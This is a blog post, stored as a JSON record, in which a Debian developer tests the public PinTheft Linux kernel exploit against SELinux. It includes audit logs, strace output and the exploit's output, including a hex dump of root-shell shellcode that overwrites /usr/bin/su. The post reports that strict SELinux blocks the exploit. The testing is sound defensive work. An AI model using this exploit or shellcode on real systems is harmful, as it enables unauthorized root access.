{
"$type": "site.standard.document",
"bskyPostRef": {
"cid": "bafyreidv2ih3656itkrjpdnh6pwc2ft2sitdt3rfty42zknoqlwouggaom",
"uri": "at://did:plc:46ti67tc37qcmwp2vaynk6fq/app.bsky.feed.post/3mmlvhtpzzkz2"
},
"coverImage": {
"$type": "blob",
"ref": {
"$link": "bafkreifqaymphlhaou7ymuxlsdcq46k6c4k27dbs2lrqq2rxp5ioaxmdoy"
},
"mimeType": "image/jpeg",
"size": 8554
},
"path": "/2026/05/24/debian-selinux-pintheft/",
"publishedAt": "2026-05-24T11:49:43.420Z",
"site": "https://etbe.coker.com.au",
"tags": [
"a new Linux exploit called PinTheft [1]",
"https://github.com/v12-security/pocs/tree/main/pintheft",
"Debian SE Linux and ssh-keysign-pwn",
"Copy Fail on Debian and SE Linux",
"Dirty Frag on Debian and SE Linux"
],
"textContent": "We have a new Linux exploit called PinTheft [1]. I did some tests of it with Debian kernel **6.12.74+deb13+1-amd64**.\n\n## user_t\n\nWhen I run the exploit as user_t, I see the following in the audit log:\n\n\n type=PROCTITLE msg=audit(1779615031.043:15540): proctitle=\"./exp\"\n type=AVC msg=audit(1779615031.043:15541): avc: denied { create } for pid=1360 comm=\"exp\" scontext=user_u:user_r:user_t:s0 tcontext=user_u:user_r:user_t:s0 tclass=rds_socket permissive=0\n type=SYSCALL msg=audit(1779615031.043:15541): arch=c000003e syscall=41 success=no exit=-13 a0=15 a1=5 a2=0 a3=0 items=0 ppid=879 pid=1360 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=1 comm=\"exp\" exe=\"/home/test/b/pocs/pintheft/exp\" subj=user_u:user_r:user_t:s0 key=(null)ARCH=x86_64 SYSCALL=socket AUID=\"test\" UID=\"test\" GID=\"test\" EUID=\"test\" SUID=\"test\" FSUID=\"test\" EGID=\"test\" SGID=\"test\" FSGID=\"test\"\n\nThe final lines of output from running the exploit are the following:\n\n\n [-] only stole 0/1024 refs — may not be enough\n [-] too few stolen refs, aborting\n [-] attempt 5 failed, retrying...\n [-] all 5 attempts failed\n\n## unconfined_t\n\nWhen I ran it as unconfined_t it gave the same output, and stracing it showed many of the following:\n\n\n socket(AF_RDS, SOCK_SEQPACKET, 0) = -1 EAFNOSUPPORT (Address family not supported by protocol)\n\nAfter I ran “**modprobe rds**” the exploit worked as unconfined_t with the following output:\n\n\n [*] verifying page cache overwrite...\n [*] page cache page 0 AFTER overwrite (our shellcode) (129 bytes):\n 0000: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|\n 0010: 03 00 3e 00 01 00 00 00 68 00 00 00 00 00 00 00 |..>.....h.......|\n 0020: 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |8...............|\n 0030: 00 00 00 00 40 00 38 00 01 00 00 00 05 00 00 00 |....@.8.........|\n 0040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\n 0050: 2f 62 69 6e 2f 73 68 00 81 00 00 00 00 00 00 00 |/bin/sh.........|\n 0060: 81 00 00 00 00 00 00 00 31 ff b0 69 0f 05 48 8d |........1..i..H.|\n 0070: 3d db ff ff ff 6a 00 57 48 89 e6 31 d2 b0 3b 0f |=....j.WH..1..;.|\n 0080: 05 |.|\n\n [+] verification PASSED — page cache overwritten with SHELL_ELF\n [+] executing /usr/bin/su (now contains setuid(0) + execve /bin/sh)...\n\n === RESTORE: sudo cp /tmp/.backup_su_13294 /usr/bin/su && sudo chmod u+s /usr/bin/su ===\n #\n\n## Conclusion\n\nSE Linux in a “strict” configuration stops this exploit.\n\nThe test VM is running Debian/Testing; I haven’t bothered investigating whether it’s a default setting for Debian to not load the **rds** module or whether it was some change that I made either directly or indirectly. Security via SE Linux is of more interest to me than security via controlling module load.\n\n * https://github.com/v12-security/pocs/tree/main/pintheft\n\n\n\nRelated posts:\n\n 1. Debian SE Linux and ssh-keysign-pwn I just tested out the ssh-keysign-pwn exploit [1] on Debian...\n 2. Copy Fail on Debian and SE Linux I have just learned of the Copy Fail kernel vulnerability...\n 3. Dirty Frag on Debian and SE Linux Hot on the heels of the Copy Fail vulnerability [1]...\n\n",
"title": "Russell Coker: Debian SE Linux and PinTheft",
"updatedAt": "2026-05-24T10:32:57.000Z"
}